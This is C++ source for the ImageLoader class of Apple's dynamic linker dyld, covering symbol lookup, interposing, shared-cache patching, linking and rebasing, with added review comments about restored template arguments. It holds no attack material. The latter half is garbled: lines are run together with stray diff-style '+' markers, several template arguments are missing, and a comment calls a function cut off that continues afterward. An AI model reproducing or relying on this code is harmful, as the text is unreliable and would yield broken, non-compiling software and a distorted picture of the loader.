uint64_t ImageLoader::fgTotalInitTime;
uint16_t ImageLoader::fgLoadOrdinal = 0;
uint32_t ImageLoader::fgSymbolTrieSearchs = 0;
// NOTE(review): the template argument was eaten by extraction mangling;
// restored from upstream ImageLoader.h (std::vector<ImageLoader::InterposeTuple>) — verify.
std::vector<ImageLoader::InterposeTuple> ImageLoader::fgInterposingTuples;
uintptr_t ImageLoader::fgNextPIEDylibAddress = 0;



// Construct an image record for 'path' with room for 'libCount' dependents.
// Assigns a monotonically increasing load order and pre-hashes the path.
ImageLoader::ImageLoader(const char* path, unsigned int libCount)
    : fPath(path), fRealPath(NULL), fDevice(0), fInode(0), fLastModified(0),
    fPathHash(0), fDlopenReferenceCount(0), fInitializerRecursiveLock(NULL),
    fLoadOrder(fgLoadOrdinal++), fDepth(0), fObjCMappedNotified(false), fState(0), fLibraryCount(libCount),
    fMadeReadOnly(false), fAllLibraryChecksumsAndLoadAddressesMatch(false), fLeaveMapped(false), fNeverUnload(false),
    fHideSymbols(false), fMatchByInstallName(false),
    fInterposed(false), fRegisteredDOF(false), fAllLazyPointersBound(false),
    fBeingRemoved(false), fAddFuncNotified(false),
    fPathOwnedByImage(false), fIsReferencedDownward(false),
    fWeakSymbolsBound(false)
{
#if __x86_64__
    fAotPath = NULL;
#endif
    if ( fPath != NULL )
        fPathHash = hash(fPath);
    if ( libCount > 512 )
        dyld::throwf("too many dependent dylibs in %s", path);
}


// Virtual-dtor trampoline so subclasses are destroyed through the base pointer.
void ImageLoader::deleteImage(ImageLoader* image)
{
    delete image;
}


// Release any heap-owned path strings.
ImageLoader::~ImageLoader()
{
    if ( fRealPath != NULL )
        delete [] fRealPath;
    if ( fPathOwnedByImage && (fPath != NULL) )
        delete [] fPath;
#if __x86_64__
    if ( fAotPath != NULL )
        delete [] fAotPath;
#endif
}

// Record the backing file's identity (used later by statMatch()).
void ImageLoader::setFileInfo(dev_t device, ino_t inode, time_t modDate)
{
    fDevice       = device;
    fInode        = inode;
    fLastModified = modDate;
}

// Transition to the 'mapped' state and notify observers.
void ImageLoader::setMapped(const LinkContext& context)
{
    fState = dyld_image_state_mapped;
    context.notifySingle(dyld_image_state_mapped, this, NULL);  // note: can throw exception
}

// Ordering for initializer sequencing: primarily by dependency depth,
// secondarily by load order.
int ImageLoader::compare(const ImageLoader* right) const
{
    if ( this->fDepth == right->fDepth ) {
        if ( this->fLoadOrder == right->fLoadOrder )
            return 0;
        else if ( this->fLoadOrder < right->fLoadOrder )
            return -1;
        else
            return 1;
    }
    else {
        if ( this->fDepth < right->fDepth )
            return -1;
        else
            return 1;
    }
}

// Replace fPath with an owned copy of 'path'; invalidates any cached real path.
void ImageLoader::setPath(const char* path)
{
    if ( fPathOwnedByImage && (fPath != NULL) )
        delete [] fPath;
    fPath = new char[strlen(path)+1];
    strcpy((char*)fPath, path);
    fPathOwnedByImage = true;  // delete fPath when this image is destructed
    fPathHash = hash(fPath);
    if ( fRealPath != NULL ) {
        delete [] fRealPath;
        fRealPath = NULL;
    }
}

// Point fPath at caller-owned storage (no copy, no ownership).
void ImageLoader::setPathUnowned(const char* path)
{
    if ( fPathOwnedByImage && (fPath != NULL) ) {
        delete [] fPath;
    }
    fPath = path;
    fPathOwnedByImage = false;
    fPathHash = hash(fPath);
}

// Set both the requested path and the resolved (symlink-free) real path.
void ImageLoader::setPaths(const char* path, const char* realPath)
{
    this->setPath(path);
    fRealPath = new char[strlen(realPath)+1];
    strcpy((char*)fRealPath, realPath);
}


// Return the resolved real path if known, else the requested path.
const char* ImageLoader::getRealPath() const
{
    if ( fRealPath != NULL )
        return fRealPath;
    else
        return fPath;
}

uint32_t ImageLoader::hash(const char* path)
{
    // this does not need to be a great hash
    // it is just used to reduce the number of strcmp() calls
    // of existing images when loading a new image
    uint32_t h = 0;
    for (const char* s=path; *s != '\0'; ++s)
        h = h*5 + *s;
    return h;
}

// Whether lookups may match this image by its install name.
bool ImageLoader::matchInstallPath() const
{
    return fMatchByInstallName;
}

void ImageLoader::setMatchInstallPath(bool match)
{
    fMatchByInstallName = match;
}

// True if 'stat_buf' refers to the same file (device+inode) as this image.
bool ImageLoader::statMatch(const struct stat& stat_buf) const
{
    return ( (this->fDevice == stat_buf.st_dev) && (this->fInode == stat_buf.st_ino) );
}

const char* ImageLoader::shortName(const char* fullName)
{
    // try to return leaf name
    if ( fullName != NULL ) {
        const char* s = strrchr(fullName, '/');
        if ( s != NULL )
            return &s[1];
    }
    return fullName;
}

const char* ImageLoader::getShortName() const
{
    return shortName(fPath);
}

// Keep the image mapped even if it would otherwise be unloaded.
void ImageLoader::setLeaveMapped()
{
    fLeaveMapped = true;
}

void ImageLoader::setHideExports(bool hide)
{
    fHideSymbols = hide;
}

bool ImageLoader::hasHiddenExports() const
{
    return fHideSymbols;
}

// An image counts as linked once it has reached the 'bound' state or later.
bool ImageLoader::isLinked() const
{
    return (fState >= dyld_image_state_bound);
}

time_t ImageLoader::lastModified() const
{
    return fLastModified;
}

// True if 'addr' falls inside any accessible segment of this image.
bool ImageLoader::containsAddress(const void* addr) const
{
    for(unsigned int i=0, e=segmentCount(); i < e; ++i) {
        const uint8_t* start = (const uint8_t*)segActualLoadAddress(i);
        const uint8_t* end   = (const uint8_t*)segActualEndAddress(i);
        if ( (start <= addr) && (addr < end) && !segUnaccessible(i) )
            return true;
    }
    return false;
}

// True if any segment of this image overlaps the half-open range [start,end).
bool ImageLoader::overlapsWithAddressRange(const void* start, const void* end) const
{
    for(unsigned int i=0, e=segmentCount(); i < e; ++i) {
        const uint8_t* segStart = (const uint8_t*)segActualLoadAddress(i);
        const uint8_t* segEnd   = (const uint8_t*)segActualEndAddress(i);
        if ( strcmp(segName(i), "__UNIXSTACK") == 0 ) {
            // __UNIXSTACK never slides.  This is the only place that cares
            // and checking for that segment name in segActualLoadAddress()
            // is too expensive.
            segStart -= getSlide();
            segEnd   -= getSlide();
        }
        if ( (start <= segStart) && (segStart < end) )
            return true;
        if ( (start <= segEnd) && (segEnd < end) )
            return true;
        if ( (segStart < start) && (end < segEnd) )
            return true;
    }
    return false;
}

// Append one MappedRegion per segment to the caller's array (pointer advances).
void ImageLoader::getMappedRegions(MappedRegion*& regions) const
{
    for(unsigned int i=0, e=segmentCount(); i < e; ++i) {
        MappedRegion region;
        region.address = segActualLoadAddress(i);
        region.size    = segSize(i);
        *regions++ = region;
    }
}



// True if 'image' is a direct dependent of this image.
bool ImageLoader::dependsOn(ImageLoader* image) {
    for(unsigned int i=0; i < libraryCount(); ++i) {
        if ( libImage(i) == image )
            return true;
    }
    return false;
}


// Helper for the dependent-image search: true if 'image' is NOT already in
// the already-searched list [dsiStart, dsiCur).
static bool notInImgageList(const ImageLoader* image, const ImageLoader** dsiStart, const ImageLoader** dsiCur)
{
    for (const ImageLoader** p = dsiStart; p < dsiCur; ++p)
        if ( *p == image )
            return false;
    return true;
}

// Look up an exported symbol and, if found, resolve it to an address.
// NOTE(review): 'requestorOrdinalOfDef' is unused in this body — presumably
// consumed by an overload or kept for ABI; confirm against callers.
bool ImageLoader::findExportedSymbolAddress(const LinkContext& context, const char* symbolName,
                                            const ImageLoader* requestorImage, int requestorOrdinalOfDef,
                                            bool runResolver, const ImageLoader** foundIn, uintptr_t* address) const
{
    const Symbol* sym = this->findExportedSymbol(symbolName, true, foundIn);
    if ( sym != NULL ) {
        *address = (*foundIn)->getExportedSymbolAddress(sym, context, requestorImage, runResolver);
        return true;
    }
    return false;
}


// private method that handles circular dependencies by only search any image once
const ImageLoader::Symbol* ImageLoader::findExportedSymbolInDependentImagesExcept(const char* name,
                                            const ImageLoader** dsiStart, const ImageLoader**& dsiCur, const ImageLoader** dsiEnd, const ImageLoader** foundIn) const
{
    const ImageLoader::Symbol* sym;
    // search self
    if ( notInImgageList(this, dsiStart, dsiCur) ) {
        sym = this->findExportedSymbol(name, false, this->getPath(), foundIn);
        if ( sym != NULL )
            return sym;
        *dsiCur++ = this;
    }

    // search directly dependent libraries
    for(unsigned int i=0; i < libraryCount(); ++i) {
        ImageLoader* dependentImage = libImage(i);
        if ( (dependentImage != NULL) && notInImgageList(dependentImage, dsiStart, dsiCur) ) {
            sym = dependentImage->findExportedSymbol(name, false, libPath(i), foundIn);
            if ( sym != NULL )
                return sym;
        }
    }

    // search indirectly dependent libraries
    for(unsigned int i=0; i < libraryCount(); ++i) {
        ImageLoader* dependentImage = libImage(i);
        if ( (dependentImage != NULL) && notInImgageList(dependentImage, dsiStart, dsiCur) ) {
            *dsiCur++ = dependentImage;
            sym = dependentImage->findExportedSymbolInDependentImagesExcept(name, dsiStart, dsiCur, dsiEnd, foundIn);
            if ( sym != NULL )
                return sym;
        }
    }

    return NULL;
}


// Search dependents (but not this image itself) for an exported symbol.
// The VLA holds the already-visited set for cycle avoidance.
const ImageLoader::Symbol* ImageLoader::findExportedSymbolInDependentImages(const char* name, const LinkContext& context, const ImageLoader** foundIn) const
{
    unsigned int imageCount = context.imageCount()+2;
    const ImageLoader* dontSearchImages[imageCount];
    dontSearchImages[0] = this;  // don't search this image
    const ImageLoader** cur = &dontSearchImages[1];
    return this->findExportedSymbolInDependentImagesExcept(name, &dontSearchImages[0], cur, &dontSearchImages[imageCount], foundIn);
}

// Like the above, but this image itself is also searched (visited set starts empty).
const ImageLoader::Symbol* ImageLoader::findExportedSymbolInImageOrDependentImages(const char* name, const LinkContext& context, const ImageLoader** foundIn) const
{
    unsigned int imageCount = context.imageCount()+2;
    const ImageLoader* dontSearchImages[imageCount];
    const ImageLoader** cur = &dontSearchImages[0];
    return this->findExportedSymbolInDependentImagesExcept(name, &dontSearchImages[0], cur, &dontSearchImages[imageCount], foundIn);
}

// this is called by initializeMainExecutable() to interpose on the initial set of images
void ImageLoader::applyInterposing(const LinkContext& context)
{
    dyld3::ScopedTimer timer(DBG_DYLD_TIMING_APPLY_INTERPOSING, 0, 0, 0);
    if ( fgInterposingTuples.size() != 0 )
        this->recursiveApplyInterposing(context);
}


// Map 'address' through the global interposing table: if a tuple's replacee
// matches (and its image filters allow), return the replacement address;
// otherwise return 'address' unchanged.
// NOTE(review): iterator template arguments below were eaten by extraction
// mangling; restored from upstream (std::vector<InterposeTuple>) — verify.
uintptr_t ImageLoader::interposedAddress(const LinkContext& context, uintptr_t address, const ImageLoader* inImage, const ImageLoader* onlyInImage)
{
    //dyld::log("interposedAddress(0x%08llX), tupleCount=%lu\n", (uint64_t)address, fgInterposingTuples.size());
    for (std::vector<InterposeTuple>::iterator it=fgInterposingTuples.begin(); it != fgInterposingTuples.end(); it++) {
        //dyld::log("  interposedAddress: replacee=0x%08llX, replacement=0x%08llX, neverImage=%p, onlyImage=%p, inImage=%p\n",
        //          (uint64_t)it->replacee, (uint64_t)it->replacement, it->neverImage, it->onlyImage, inImage);
        // replace all references to 'replacee' with 'replacement'
        if ( (address == it->replacee) && (it->neverImage != inImage) && ((it->onlyImage == NULL) || (it->onlyImage == inImage)) ) {
            if ( context.verboseInterposing ) {
                dyld::log("dyld interposing: replace 0x%lX with 0x%lX\n", it->replacee, it->replacement);
            }
            return it->replacement;
        }
    }
    return address;
}

// For each interposed replacee located in the shared cache, patch every use
// recorded in that cache image's patch table (handling ptrauth re-signing
// when built with pointer authentication).
void ImageLoader::applyInterposingToDyldCache(const LinkContext& context) {
    if (!context.dyldCache)
        return;
    if (!context.dyldCache->header.builtFromChainedFixups)
        return;
    if (fgInterposingTuples.empty())
        return;

    // make the cache writable for this block
    DyldSharedCache::DataConstScopedWriter patcher(context.dyldCache, mach_task_self(), (context.verboseMapping ? &dyld::log : nullptr));

    // For each of the interposed addresses, see if any of them are in the shared cache.  If so, find
    // that image and apply its patch table to all uses.
    uintptr_t cacheStart = (uintptr_t)context.dyldCache;
    for (std::vector<InterposeTuple>::iterator it=fgInterposingTuples.begin(); it != fgInterposingTuples.end(); it++) {
        if ( context.verboseInterposing )
            dyld::log("dyld: interpose: Trying to interpose address 0x%08llx\n", (uint64_t)it->replacee);
        uint32_t imageIndex;
        uint32_t cacheOffsetOfReplacee = (uint32_t)(it->replacee - cacheStart);
        if (!context.dyldCache->addressInText(cacheOffsetOfReplacee, &imageIndex))
            continue;
        dyld3::closure::ImageNum imageInCache = imageIndex+1;
        if ( context.verboseInterposing )
            dyld::log("dyld: interpose: Found shared cache image %d for 0x%08llx\n", imageInCache, (uint64_t)it->replacee);
        context.dyldCache->forEachPatchableExport(imageIndex, ^(uint32_t cacheOffsetOfImpl, const char* exportName) {
            // Skip patching anything other than this symbol
            if (cacheOffsetOfImpl != cacheOffsetOfReplacee)
                return;
            if ( context.verboseInterposing ) {
                const dyld3::closure::Image* image = context.dyldCache->cachedDylibsImageArray()->imageForNum(imageInCache);
                dyld::log("dyld: interpose: Patching uses of symbol %s in shared cache binary at %s\n", exportName, image->path());
            }
            uintptr_t newLoc = it->replacement;
            context.dyldCache->forEachPatchableUseOfExport(imageIndex, cacheOffsetOfImpl, ^(dyld_cache_patchable_location patchLocation) {
                uintptr_t* loc = (uintptr_t*)(cacheStart+patchLocation.cacheOffset);
#if __has_feature(ptrauth_calls)
                if ( patchLocation.authenticated ) {
                    // re-sign the replacement pointer with the location's original diversity/key
                    dyld3::MachOLoaded::ChainedFixupPointerOnDisk ptr = *(dyld3::MachOLoaded::ChainedFixupPointerOnDisk*)loc;
                    ptr.arm64e.authRebase.auth      = true;
                    ptr.arm64e.authRebase.addrDiv   = patchLocation.usesAddressDiversity;
                    ptr.arm64e.authRebase.diversity = patchLocation.discriminator;
                    ptr.arm64e.authRebase.key       = patchLocation.key;
                    *loc = ptr.arm64e.signPointer(loc, newLoc + DyldSharedCache::getAddend(patchLocation));
                    if ( context.verboseInterposing )
                        dyld::log("dyld: interpose: *%p = %p (JOP: diversity 0x%04X, addr-div=%d, key=%s)\n",
                                  loc, (void*)*loc, patchLocation.discriminator, patchLocation.usesAddressDiversity, DyldSharedCache::keyName(patchLocation));
                    return;
                }
#endif
                if ( context.verboseInterposing )
                    dyld::log("dyld: interpose: *%p = 0x%0llX (dyld cache patch) to %s\n", loc, newLoc + DyldSharedCache::getAddend(patchLocation), exportName);
                *loc = newLoc + (uintptr_t)DyldSharedCache::getAddend(patchLocation);
            });
        });
    }
}

// Register dlopen-time (dynamic) interposing tuples, scoped to this image only.
// Chains through existing tuples so a replacee already interposed resolves to
// the final replacement.
void ImageLoader::addDynamicInterposingTuples(const struct dyld_interpose_tuple array[], size_t count)
{
    for(size_t i=0; i < count; ++i) {
        ImageLoader::InterposeTuple tuple;
        tuple.replacement = (uintptr_t)array[i].replacement;
        tuple.neverImage  = NULL;
        tuple.onlyImage   = this;
        tuple.replacee    = (uintptr_t)array[i].replacee;
        // chain to any existing interpositions
        for (std::vector<InterposeTuple>::iterator it=fgInterposingTuples.begin(); it != fgInterposingTuples.end(); it++) {
            if ( (it->replacee == tuple.replacee) && (it->onlyImage == this) ) {
                tuple.replacee = it->replacement;
            }
        }
        ImageLoader::fgInterposingTuples.push_back(tuple);
    }
}

// dyld should tell the kernel when it is doing root fix-ups
// NOTE(review): this function is cut off at the end of this chunk; the
// remainder of its body lies beyond the visible range.
void ImageLoader::vmAccountingSetSuspended(const LinkContext& context, bool suspend)
{
#if TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR
    static bool sVmAccountingSuspended = false;
    if ( suspend == sVmAccountingSuspended )
        return;
    if ( context.verboseBind )
        dyld::log("set vm.footprint_suspend=%d\n", suspend);
    int newValue = suspend ?
1 : 0; + int oldValue = 0; + size_t newlen = sizeof(newValue); + size_t oldlen = sizeof(oldValue); + int ret = sysctlbyname("vm.footprint_suspend", &oldValue, &oldlen, &newValue, newlen); + if ( context.verboseBind && (ret != 0) ) + dyld::log("vm.footprint_suspend => %d, errno=%d\n", ret, errno); + sVmAccountingSuspended = suspend; +#endif +} + + +void ImageLoader::link(const LinkContext& context, bool forceLazysBound, bool preflightOnly, bool neverUnload, const RPathChain& loaderRPaths, const char* imagePath) +{ + //dyld::log("ImageLoader::link(%s) refCount=%d, neverUnload=%d\n", imagePath, fDlopenReferenceCount, fNeverUnload); + + // clear error strings + (*context.setErrorStrings)(0, NULL, NULL, NULL); + + uint64_t t0 = mach_absolute_time(); + this->recursiveLoadLibraries(context, preflightOnly, loaderRPaths, imagePath); + context.notifyBatch(dyld_image_state_dependents_mapped, preflightOnly); + + // we only do the loading step for preflights + if ( preflightOnly ) + return; + + uint64_t t1 = mach_absolute_time(); + context.clearAllDepths(); + this->updateDepth(context.imageCount()); + + __block uint64_t t2, t3, t4, t5; + { + dyld3::ScopedTimer(DBG_DYLD_TIMING_APPLY_FIXUPS, 0, 0, 0); + t2 = mach_absolute_time(); + this->recursiveRebaseWithAccounting(context); + context.notifyBatch(dyld_image_state_rebased, false); + + t3 = mach_absolute_time(); + if ( !context.linkingMainExecutable ) + this->recursiveBindWithAccounting(context, forceLazysBound, neverUnload); + + t4 = mach_absolute_time(); + if ( !context.linkingMainExecutable ) + this->weakBind(context); + t5 = mach_absolute_time(); + } + + // interpose any dynamically loaded images + if ( !context.linkingMainExecutable && (fgInterposingTuples.size() != 0) ) { + dyld3::ScopedTimer timer(DBG_DYLD_TIMING_APPLY_INTERPOSING, 0, 0, 0); + this->recursiveApplyInterposing(context); + } + + // now that all fixups are done, make __DATA_CONST segments read-only + if ( !context.linkingMainExecutable ) + 
this->recursiveMakeDataReadOnly(context); + + if ( !context.linkingMainExecutable ) + context.notifyBatch(dyld_image_state_bound, false); + uint64_t t6 = mach_absolute_time(); + + if ( context.registerDOFs != NULL ) { + std::vector dofs; + this->recursiveGetDOFSections(context, dofs); + context.registerDOFs(dofs); + } + uint64_t t7 = mach_absolute_time(); + + // clear error strings + (*context.setErrorStrings)(0, NULL, NULL, NULL); + + fgTotalLoadLibrariesTime += t1 - t0; + fgTotalRebaseTime += t3 - t2; + fgTotalBindTime += t4 - t3; + fgTotalWeakBindTime += t5 - t4; + fgTotalDOF += t7 - t6; + + // done with initial dylib loads + fgNextPIEDylibAddress = 0; +} + + +void ImageLoader::printReferenceCounts() +{ + dyld::log(" dlopen=%d for %s\n", fDlopenReferenceCount, getPath() ); +} + + +bool ImageLoader::decrementDlopenReferenceCount() +{ + if ( fDlopenReferenceCount == 0 ) + return true; + --fDlopenReferenceCount; + return false; +} + + +// upward dylib initializers can be run too soon +// To handle dangling dylibs which are upward linked but not downward, all upward linked dylibs +// have their initialization postponed until after the recursion through downward dylibs +// has completed. +void ImageLoader::processInitializers(const LinkContext& context, mach_port_t thisThread, + InitializerTimingList& timingInfo, ImageLoader::UninitedUpwards& images) +{ + uint32_t maxImageCount = context.imageCount()+2; + ImageLoader::UninitedUpwards upsBuffer[maxImageCount]; + ImageLoader::UninitedUpwards& ups = upsBuffer[0]; + ups.count = 0; + // Calling recursive init on all images in images list, building a new list of + // uninitialized upward dependencies. + for (uintptr_t i=0; i < images.count; ++i) { + images.imagesAndPaths[i].first->recursiveInitialization(context, thisThread, images.imagesAndPaths[i].second, timingInfo, ups); + } + // If any upward dependencies remain, init them. 
+ if ( ups.count > 0 ) + processInitializers(context, thisThread, timingInfo, ups); +} + + +void ImageLoader::runInitializers(const LinkContext& context, InitializerTimingList& timingInfo) +{ + uint64_t t1 = mach_absolute_time(); + mach_port_t thisThread = mach_thread_self(); + ImageLoader::UninitedUpwards up; + up.count = 1; + up.imagesAndPaths[0] = { this, this->getPath() }; + processInitializers(context, thisThread, timingInfo, up); + context.notifyBatch(dyld_image_state_initialized, false); + mach_port_deallocate(mach_task_self(), thisThread); + uint64_t t2 = mach_absolute_time(); + fgTotalInitTime += (t2 - t1); +} + + +void ImageLoader::bindAllLazyPointers(const LinkContext& context, bool recursive) +{ + if ( ! fAllLazyPointersBound ) { + fAllLazyPointersBound = true; + + if ( recursive ) { + // bind lower level libraries first + for(unsigned int i=0; i < libraryCount(); ++i) { + ImageLoader* dependentImage = libImage(i); + if ( dependentImage != NULL ) + dependentImage->bindAllLazyPointers(context, recursive); + } + } + // bind lazies in this image + DyldSharedCache::DataConstLazyScopedWriter patcher(context.dyldCache, mach_task_self(), context.verboseMapping ? 
&dyld::log : nullptr); + this->doBindJustLazies(context, patcher); + } +} + + +bool ImageLoader::allDependentLibrariesAsWhenPreBound() const +{ + return fAllLibraryChecksumsAndLoadAddressesMatch; +} + + +void ImageLoader::markedUsedRecursive(const std::vector& dynamicReferences) +{ + // already visited here + if ( fMarkedInUse ) + return; + fMarkedInUse = true; + + // clear mark on all statically dependent dylibs + for(unsigned int i=0; i < libraryCount(); ++i) { + ImageLoader* dependentImage = libImage(i); + if ( dependentImage != NULL ) { + dependentImage->markedUsedRecursive(dynamicReferences); + } + } + + // clear mark on all dynamically dependent dylibs + for (std::vector::const_iterator it=dynamicReferences.begin(); it != dynamicReferences.end(); ++it) { + if ( it->from == this ) + it->to->markedUsedRecursive(dynamicReferences); + } + +} + +unsigned int ImageLoader::updateDepth(unsigned int maxDepth) +{ + STACK_ALLOC_ARRAY(ImageLoader*, danglingUpwards, maxDepth); + unsigned int depth = this->recursiveUpdateDepth(maxDepth, danglingUpwards); + for (auto& danglingUpward : danglingUpwards) { + if ( danglingUpward->fDepth != 0) + continue; + danglingUpward->recursiveUpdateDepth(maxDepth, danglingUpwards); + } + return depth; +} + +unsigned int ImageLoader::recursiveUpdateDepth(unsigned int maxDepth, dyld3::Array& danglingUpwards) +{ + // the purpose of this phase is to make the images sortable such that + // in a sort list of images, every image that an image depends on + // occurs in the list before it. 
+ if ( fDepth == 0 ) { + // break cycles + fDepth = maxDepth; + + // get depth of dependents + unsigned int minDependentDepth = maxDepth; + for(unsigned int i=0; i < libraryCount(); ++i) { + ImageLoader* dependentImage = libImage(i); + if ( dependentImage != NULL ) { + if ( libIsUpward(i) ) { + if ( dependentImage->fDepth == 0) { + if ( !danglingUpwards.contains(dependentImage) ) + danglingUpwards.push_back(dependentImage); + } + } else { + unsigned int d = dependentImage->recursiveUpdateDepth(maxDepth, danglingUpwards); + if ( d < minDependentDepth ) + minDependentDepth = d; + } + } + // make sure need to re-bind propagates up + if ( dependentImage != NULL ) { + if ( fAllLibraryChecksumsAndLoadAddressesMatch && !dependentImage->fAllLibraryChecksumsAndLoadAddressesMatch ) { + fAllLibraryChecksumsAndLoadAddressesMatch = false; + } + } + } + // make me less deep then all my dependents + fDepth = minDependentDepth - 1; + + } + return fDepth; +} + + +void ImageLoader::recursiveLoadLibraries(const LinkContext& context, bool preflightOnly, const RPathChain& loaderRPaths, const char* loadPath) +{ + if ( fState < dyld_image_state_dependents_mapped ) { + // break cycles + fState = dyld_image_state_dependents_mapped; + + // get list of libraries this image needs + DependentLibraryInfo libraryInfos[fLibraryCount]; + this->doGetDependentLibraries(libraryInfos); + + // get list of rpaths that this image adds + std::vector rpathsFromThisImage; + this->getRPaths(context, rpathsFromThisImage); + const RPathChain thisRPaths(&loaderRPaths, &rpathsFromThisImage); + + // try to load each + bool canUsePrelinkingInfo = true; + for(unsigned int i=0; i < fLibraryCount; ++i){ + ImageLoader* dependentLib; + bool depLibReExported = false; + DependentLibraryInfo& requiredLibInfo = libraryInfos[i]; + if ( preflightOnly && context.inSharedCache(requiredLibInfo.name) ) { + // dlopen_preflight() on image in shared cache leaves it loaded but not objc initialized + // in preflight mode, don't even 
load dylib that are in the shared cache because they will never be unloaded + setLibImage(i, NULL, false, false); + continue; + } + try { + unsigned cacheIndex; + dependentLib = context.loadLibrary(requiredLibInfo.name, true, this->getPath(), &thisRPaths, cacheIndex); + if ( dependentLib == this ) { + // found circular reference, perhaps DYLD_LIBARY_PATH is causing this rdar://problem/3684168 + dependentLib = context.loadLibrary(requiredLibInfo.name, false, NULL, NULL, cacheIndex); + if ( dependentLib != this ) + dyld::warn("DYLD_ setting caused circular dependency in %s\n", this->getPath()); + } + if ( fNeverUnload ) + dependentLib->setNeverUnload(); + if ( requiredLibInfo.upward ) { + } + else { + dependentLib->fIsReferencedDownward = true; + } + LibraryInfo actualInfo = dependentLib->doGetLibraryInfo(requiredLibInfo.info); + depLibReExported = requiredLibInfo.reExported; + if ( ! depLibReExported ) { + // for pre-10.5 binaries that did not use LC_REEXPORT_DYLIB + depLibReExported = dependentLib->isSubframeworkOf(context, this) || this->hasSubLibrary(context, dependentLib); + } + // check found library version is compatible + // 0xFFFFFFFF is wildcard that matches any version + if ( (requiredLibInfo.info.minVersion != 0xFFFFFFFF) && (actualInfo.minVersion < requiredLibInfo.info.minVersion) + && ((dyld3::MachOFile*)(dependentLib->machHeader()))->enforceCompatVersion() ) { + // record values for possible use by CrashReporter or Finder + dyld::throwf("Incompatible library version: %s requires version %d.%d.%d or later, but %s provides version %d.%d.%d", + this->getShortName(), requiredLibInfo.info.minVersion >> 16, (requiredLibInfo.info.minVersion >> 8) & 0xff, requiredLibInfo.info.minVersion & 0xff, + dependentLib->getShortName(), actualInfo.minVersion >> 16, (actualInfo.minVersion >> 8) & 0xff, actualInfo.minVersion & 0xff); + } + // prebinding for this image disabled if any dependent library changed + //if ( !depLibCheckSumsMatch ) + // canUsePrelinkingInfo = 
false; + // prebinding for this image disabled unless both this and dependent are in the shared cache + if ( !dependentLib->inSharedCache() || !this->inSharedCache() ) + canUsePrelinkingInfo = false; + + //if ( context.verbosePrebinding ) { + // if ( !requiredLib.checksumMatches ) + // fprintf(stderr, "dyld: checksum mismatch, (%u v %u) for %s referencing %s\n", + // requiredLibInfo.info.checksum, actualInfo.checksum, this->getPath(), dependentLib->getPath()); + // if ( dependentLib->getSlide() != 0 ) + // fprintf(stderr, "dyld: dependent library slid for %s referencing %s\n", this->getPath(), dependentLib->getPath()); + //} + } + catch (const char* msg) { + //if ( context.verbosePrebinding ) + // fprintf(stderr, "dyld: exception during processing for %s referencing %s\n", this->getPath(), dependentLib->getPath()); + if ( requiredLibInfo.required ) { + fState = dyld_image_state_mapped; + // record values for possible use by CrashReporter or Finder + if ( strstr(msg, "Incompatible library version") != NULL ) + (*context.setErrorStrings)(DYLD_EXIT_REASON_DYLIB_WRONG_VERSION, this->getPath(), requiredLibInfo.name, NULL); + else if ( strstr(msg, "architecture") != NULL ) + (*context.setErrorStrings)(DYLD_EXIT_REASON_DYLIB_WRONG_ARCH, this->getPath(), requiredLibInfo.name, NULL); + else if ( strstr(msg, "file system sandbox") != NULL ) + (*context.setErrorStrings)(DYLD_EXIT_REASON_FILE_SYSTEM_SANDBOX, this->getPath(), requiredLibInfo.name, NULL); + else if ( strstr(msg, "code signature") != NULL ) + (*context.setErrorStrings)(DYLD_EXIT_REASON_CODE_SIGNATURE, this->getPath(), requiredLibInfo.name, NULL); + else if ( strstr(msg, "malformed") != NULL ) + (*context.setErrorStrings)(DYLD_EXIT_REASON_MALFORMED_MACHO, this->getPath(), requiredLibInfo.name, NULL); + else + (*context.setErrorStrings)(DYLD_EXIT_REASON_DYLIB_MISSING, this->getPath(), requiredLibInfo.name, NULL); + const char* newMsg = dyld::mkstringf("Library not loaded: %s\n Referenced from: %s\n Reason: %s", 
requiredLibInfo.name, this->getRealPath(), msg); + free((void*)msg); // our free() will do nothing if msg is a string literal + throw newMsg; + } + free((void*)msg); // our free() will do nothing if msg is a string literal + // ok if weak library not found + dependentLib = NULL; + canUsePrelinkingInfo = false; // this disables all prebinding, we may want to just slam import vectors for this lib to zero + } + setLibImage(i, dependentLib, depLibReExported, requiredLibInfo.upward); + } + fAllLibraryChecksumsAndLoadAddressesMatch = canUsePrelinkingInfo; + + // tell each to load its dependents + for(unsigned int i=0; i < libraryCount(); ++i) { + ImageLoader* dependentImage = libImage(i); + if ( dependentImage != NULL ) { + dependentImage->recursiveLoadLibraries(context, preflightOnly, thisRPaths, libraryInfos[i].name); + } + } + // do deep prebind check + if ( fAllLibraryChecksumsAndLoadAddressesMatch ) { + for(unsigned int i=0; i < libraryCount(); ++i){ + ImageLoader* dependentImage = libImage(i); + if ( dependentImage != NULL ) { + if ( !dependentImage->allDependentLibrariesAsWhenPreBound() ) + fAllLibraryChecksumsAndLoadAddressesMatch = false; + } + } + } + + // free rpaths (getRPaths() malloc'ed each string) + for(std::vector::iterator it=rpathsFromThisImage.begin(); it != rpathsFromThisImage.end(); ++it) { + const char* str = *it; + free((void*)str); + } + + } +} + + +void ImageLoader::recursiveRebaseWithAccounting(const LinkContext& context) +{ + this->recursiveRebase(context); + vmAccountingSetSuspended(context, false); +} + +void ImageLoader::recursiveRebase(const LinkContext& context) +{ + if ( fState < dyld_image_state_rebased ) { + // break cycles + fState = dyld_image_state_rebased; + + try { + // rebase lower level libraries first + for(unsigned int i=0; i < libraryCount(); ++i) { + ImageLoader* dependentImage = libImage(i); + if ( dependentImage != NULL ) + dependentImage->recursiveRebase(context); + } + + // rebase this image + doRebase(context); + + // 
notify + context.notifySingle(dyld_image_state_rebased, this, NULL); + } + catch (const char* msg) { + // this image is not rebased + fState = dyld_image_state_dependents_mapped; + CRSetCrashLogMessage2(NULL); + throw; + } + } +} + +void ImageLoader::recursiveApplyInterposing(const LinkContext& context) +{ + if ( ! fInterposed ) { + // break cycles + fInterposed = true; + + try { + // interpose lower level libraries first + for(unsigned int i=0; i < libraryCount(); ++i) { + ImageLoader* dependentImage = libImage(i); + if ( dependentImage != NULL ) + dependentImage->recursiveApplyInterposing(context); + } + + // interpose this image + doInterpose(context); + } + catch (const char* msg) { + // this image is not interposed + fInterposed = false; + throw; + } + } +} + +void ImageLoader::recursiveMakeDataReadOnly(const LinkContext& context) +{ + if ( ! fMadeReadOnly ) { + // break cycles + fMadeReadOnly = true; + + try { + // handle lower level libraries first + for(unsigned int i=0; i < libraryCount(); ++i) { + ImageLoader* dependentImage = libImage(i); + if ( dependentImage != NULL ) + dependentImage->recursiveMakeDataReadOnly(context); + } + + // if this image has __DATA_CONST, make that segment read-only + 